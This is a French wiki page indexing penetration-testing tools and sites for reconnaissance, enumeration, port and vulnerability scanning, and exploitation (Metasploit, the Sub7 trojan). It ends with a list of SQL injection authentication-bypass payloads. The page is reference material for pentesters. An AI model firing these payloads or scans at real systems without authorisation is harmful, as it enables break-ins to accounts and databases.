====== Cybersécurité ====== ===== Pentest ===== \\ ^[[https://shellblade.net/hacking/ethical-hacking-cheat-sheet.html|Ethical Hacking Cheat Sheet]] |{{ :cybersecurite:ethical_hacking_cheat_sheet.pdf |Download PDF}} | |Reconnaissance OSINT\\ Méthode et outils |https://k-lfa.info/osint/| \\ ==== Reconnaissance passive ==== |{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Whois |whois \\ https://who.is/ |Informations nom de domaine | |{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Nslookup |nslookup |Identification adresse IP <=> Nom de domaine | |{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Dig |dig |Plus d'infos que Nslookup | | |Robtex |https://www.robtex.com/|Site web fournissant des informations complètes sur les noms de domaine | | |Shodan |https://www.shodan.io/|Site web fournissant des informations complètes sur les noms de domaine | |{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}}|Traceroute | |Identification des serveurs de rebond | \\ ==== Enumeration de machines ==== |{{:cybersecurite:logo_linux_mini.jpg?nolink&20|}}|Netdiscover |$ netdiscover -r 192.168.1.0/24 | |{{:cybersecurite:logo_windows_mini.jpg?nolink&25|}}|ARP |C:\> arp -a | |{{:cybersecurite:logo_windows_mini.jpg?nolink&25|}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20|}}|Angry IP Scanner |https://angryip.org/ | \\ ==== Scan de ports ==== |{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}} |Nmap |[[cybersecurite:pentest:port_scan:nmap|Nmap Cheat sheet]] | |{{:cybersecurite:logo_windows_mini.jpg?nolink&25 |}}{{:cybersecurite:logo_linux_mini.jpg?nolink&20 |}} |Netstat |[[cybersecurite:pentest:port_scan:netstat|Netstat Cheat sheet]] | \\ ==== Analyse de paquets réseau ==== |Wireshark | | |Tcpdump | | \\ ==== Scan de vulnérabilités ==== ^Scan de vulnérabilités système ^^^ ^Nessus |[[cybersecurite:pentest:vulnerabilities_scan:nessus|_]] || ^Snort | || ^Scan de vulnérabilités web ^^^ ^ |Qualis |https://www.ssllabs.com/ssltest/ | ^ |Hosted Scan Security |https://hostedscan.com/ | ^ |Intruder |https://www.intruder.io/ | ^ |Quttera |https://quttera.com/ | ^ |Web Cookies scanner |https://termshub.io/cookie-scanner | ^ |Detectify |https://detectify.com/ | ^ |Pentest Tools |https://pentest-tools.com/ | ^ |Immuniweb |https://www.immuniweb.com/websec/ | \\ ==== Exploiter les vulnérabilités ==== |Metasploit |[[https://k-lfa.info/metasploit-cheat-sheet/|Metasploit - les bases]] | |Sub7 | | \\ ==== SQL Injection Cheat Sheet ==== Cette liste peut être utilisée pour des tests de pénétration en contournant l'authentification par SQL Injection. //The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member).// ++++ Voir la liste| 1' or 1=1# \\ or 1=1 \\ or 1=1-- \\ or 1=1# \\ or 1=1/* \\ %' LIMIT 0,1 # \\ admin' -- \\ admin' # \\ admin'/* \\ admin' or '1'='1 \\ admin' or '1'='1'-- \\ admin' or '1'='1'# \\ admin' or '1'='1'/* \\ admin'or 1=1 or ''=' \\ admin' or 1=1 \\ admin' or 1=1-- \\ admin' or 1=1# \\ admin' or 1=1/* \\ admin') or ('1'='1 \\ admin') or ('1'='1'-- \\ admin') or ('1'='1'# \\ admin') or ('1'='1'/* \\ admin') or '1'='1 \\ admin') or '1'='1'-- \\ admin') or '1'='1'# \\ admin') or '1'='1'/* \\ 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 \\ admin" -- \\ admin" # \\ admin"/* \\ admin" or "1"="1 \\ admin" or "1"="1"-- \\ admin" or "1"="1"# \\ admin" or "1"="1"/* \\ admin"or 1=1 or ""=" \\ admin" or 1=1 \\ admin" or 1=1-- \\ admin" or 1=1# \\ admin" or 1=1/* \\ admin") or ("1"="1 \\ admin") or ("1"="1"-- \\ admin") or ("1"="1"# \\ admin") or ("1"="1"/* \\ admin") or "1"="1 \\ admin") or "1"="1"-- \\ admin") or "1"="1"# \\ admin") or "1"="1"/* \\ 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ++++ \\ Injections SQL : principes, impacts et bonnes pratiques : \\ https://www.vaadata.com/blog/fr/injections-sql-principes-impacts-exploitations-bonnes-pratiques-securite/ \\